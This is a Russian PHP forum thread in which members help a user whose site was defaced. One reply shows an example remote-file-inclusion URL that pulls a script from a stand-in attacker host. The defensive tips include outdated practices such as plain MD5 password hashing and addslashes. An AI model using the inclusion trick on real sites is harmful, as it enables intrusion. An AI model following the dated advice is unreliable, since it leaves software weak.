![]() |
|
Модераторы: skyboy, MoLeX, Aliance, ksnk |
![]()
|
|
| Гость_Сергей |
|
|||
|
Unregistered |
Мой сайт несколько раз ломали, хостер говорит, что у меня дыра в пхп скриптах. Кто знает как можно проверить скрипты (подскажите прогу), или вохможные советы по безопастности. Спасибо!
|
|||
|
||||
| Ignat |
|
|||
![]() Флудератор ![]() ![]() ![]() ![]() Профиль Группа: Экс. модератор Сообщений: 4030 Регистрация: 19.4.2004 Где: غيليندزيك مدينة Репутация: 10 Всего: 73 |
скрипты нужно писать под register_globals=off;
пароли хранить после шифровки MD5; отслеживать типы файлов в аплоаде; все данные которые постятся подвергать htmlspecialchars и addslashes; для пущей безопасности можно вести в базе логи неудачных попыток ввода пароля, определять ip, частоту ввода пароля. и просто не использовать элементарные пароли, типа qwerty, 1111. -------------------- Теперь при чем :P |
|||
|
||||
| MuToGeN |
|
|||
![]() Лесник ![]() ![]() ![]() ![]() Профиль Группа: Модератор Сообщений: 4379 Регистрация: 15.8.2002 Где: Москва Репутация: 7 Всего: 32 |
Насчет программ - таких не знаю.
Если готовы заплатить за это денег, то можете обратиться с этим вопросом в раздел "работа". -------------------- Three pings for the token rings, Five pings for the UNIX machines, Hundred pings for the broken links, One special ping to check them all Through Simple Network Management Protocol! |
|||
|
||||
| Secandr |
|
|||
|
Связист ![]() ![]() ![]() ![]() Профиль Группа: Экс. модератор Сообщений: 4043 Регистрация: 3.8.2003 Где: Russia, Volgograd Репутация: 5 Всего: 39 |
Ignat
На моём сайте на админа стоял пароль qwerty и ничего за два года попыток, взлом не удался. А брутфорсили дай боже Гость_Сергей Хорошие советы дал Ignat, если опишите что и как ваша программа делает, то можно будет дать более подробные советы. MuToGeN Я видел такие программы, но работаю они скверно, даже не находят спеуиально оставленых дырок. |
|||
|
||||
| MuToGeN |
|
|||
![]() Лесник ![]() ![]() ![]() ![]() Профиль Группа: Модератор Сообщений: 4379 Регистрация: 15.8.2002 Где: Москва Репутация: 7 Всего: 32 |
Secandr
пароль qwerty, а логин admin_VcK923MRpfKl ? =) К тому, что посоветывал Ignat: С большими проектами бывает полезно логировать ошибочные запросы и банить по IP, если таких запросов, например, больше 5 разных в минуту от одного клиента. Вполне можно сделать вывод, что тот ищет уязвимость с SQL инъекцией. -------------------- Three pings for the token rings, Five pings for the UNIX machines, Hundred pings for the broken links, One special ping to check them all Through Simple Network Management Protocol! |
|||
|
||||
| Secandr |
|
|||
|
Связист ![]() ![]() ![]() ![]() Профиль Группа: Экс. модератор Сообщений: 4043 Регистрация: 3.8.2003 Где: Russia, Volgograd Репутация: 5 Всего: 39 |
Ещё вариант: проверять $_GET и $_POST на лишние параметры и если они есть делать die. А если таких запросов много - банить ip.
MuToGeN Логин был Secandr |
|||
|
||||
| dm9 |
|
|||
![]() Дмитрий Копытин ![]() ![]() ![]() ![]() Профиль Группа: Vingrad developer Сообщений: 3876 Регистрация: 22.7.2002 Где: Москва Репутация: 2 Всего: 137 |
Небольшая коллекция на тему "security in php". Что-то по этим статьям можно начать понимать...
http://docs.com.ru/php_6.php http://docs.com.ru/php_6.php http://russian.colossus.net/manual/man3.shtml http://www.compdoc.ru/internet/php/safeprog/ http://www.compdoc.ru/internet/php/criticality_scrips/ http://detail.phpclub.net/article/php_security1 http://detail.phpclub.net/article/php_security2 http://www.atlant.ru/comar/lib/ogr12/art82/ |
|||
|
||||
| Гость_Сергей |
|
|||
|
Unregistered |
Спасибо всем, проблемма в том, что весь сайт написан на пхп и хакер каким то способом без подключения по фтп к серверу изменил картинки и содержание главной страницы, особых скриптов на сайте нет, только использовал пхп для создания верхушки и низа, потом везде вставлял. Еще сам написал новостную ленту с архивом, кто подскажет, как он смог закачать картинки без фтп. Жду, спасибо!
|
|||
|
||||
| Secandr |
|
|||
|
Связист ![]() ![]() ![]() ![]() Профиль Группа: Экс. модератор Сообщений: 4043 Регистрация: 3.8.2003 Где: Russia, Volgograd Репутация: 5 Всего: 39 |
Твои скрипты в файлы пишут что-либо?
Если да, то как формируются имена этих файлов? Если динамически, то переписывай скрипты. |
|||
|
||||
| Гость_СЕргей |
|
|||
|
Unregistered |
У меня база новостей текстовой файл!!!
|
|||
|
||||
| Ripper |
|
|||
![]() Lonely soul... ![]() ![]() Профиль Группа: Участник Сообщений: 920 Регистрация: 30.6.2004 Где: г. Москва Репутация: 1 Всего: 23 |
ну если ссылка типа http://mysite.ru/index.php?news.php
то так нельзя. Если у тебя берется имя вставляемого файла из строки адреса то он может прописать http://mysite.ru/index.php?http://hacker.ru/kill.php типа того -------------------- "Он знает: надо смеяться над тем, что тебя мучит, иначе не сохранишь равновесия, иначе мир сведет тебя с ума" - Над кукушкиным гнездом |
|||
|
||||
| Secandr |
|
|||
|
Связист ![]() ![]() ![]() ![]() Профиль Группа: Экс. модератор Сообщений: 4043 Регистрация: 3.8.2003 Где: Russia, Volgograd Репутация: 5 Всего: 39 |
смысл в том, что если действия пользователя могут повлеять на имя файла и его содержимое, то злоумышленик просто создаст hack.php, а в него запишетнормаьлный аплоадерщик и будет менять всё на твоём сайте, да и на хосте сможет много чего натворить.
|
|||
|
||||
| dm9 |
|
|||
![]() Дмитрий Копытин ![]() ![]() ![]() ![]() Профиль Группа: Vingrad developer Сообщений: 3876 Регистрация: 22.7.2002 Где: Москва Репутация: 2 Всего: 137 |
Гость_СЕргей, коли не коммерческая тайна и не больше сотни строк, кинь сюда скрипты, мне было бы интересно посмотреть. Может, и найдётся баг...
Добавлено @ 22:05 Да мы ж тут не ясновидящие, так гадать можно долго без кода... |
|||
|
||||
| LonelyWolf |
|
|||
![]() Новичок Профиль Группа: Awaiting Authorisation Сообщений: 2 Регистрация: 31.8.2005 Где: Россия Репутация: нет Всего: нет |
Да долго годать и не придёться...
1) Гость_Сергей, у тебя есть в админке где ты добовляешь новости upload например для картинок в новости????? 2) Доступ в админку по технологи отдельная страничка логин и пасс...в папке например admin а пароль с логином храниться в отдельном файле в той же папке и имеет имя типа pass.dat =) 3) Как уже говорили у тебя происходит внешний инклуд файла с новостями в открытом виде... Как в большинстве случаев.....поиметь такой сайт 1.5-3 минуты.... Да зачем просить выложить код....и что щас поможем исправим за него багу, а в следующий раз его сломают он опять кого-нибудь будет просить...надо самому....тогда и ошибок меньше будет... Это сообщение отредактировал(а) LonelyWolf - 7.9.2005, 09:51 |
|||
|
||||
| Ignat |
|
|||
![]() Флудератор ![]() ![]() ![]() ![]() Профиль Группа: Экс. модератор Сообщений: 4030 Регистрация: 19.4.2004 Где: غيليندزيك مدينة Репутация: 10 Всего: 73 |
LonelyWolf, ты б еще дольше думал
Больше года прошло. -------------------- Теперь при чем :P |
|||
|
||||
![]()
|
| Правила форума "PHP" | |
|
|
Новичкам:
Важно:
Внимание:
Если Вам понравилась атмосфера форума, заходите к нам чаще! С уважением, IZ@TOP, skyboy, SamDark, MoLeX, awers. |
| 0 Пользователей читают эту тему (0 Гостей и 0 Скрытых Пользователей) | |
| 0 Пользователей: | |
| « Предыдущая тема | PHP: Общие вопросы | Следующая тема » |
|
|
По вопросам размещения рекламы пишите на vladimir(sobaka)vingrad.ru
Отказ от ответственности Powered by Invision Power Board(R) 1.3 © 2003 IPS, Inc. |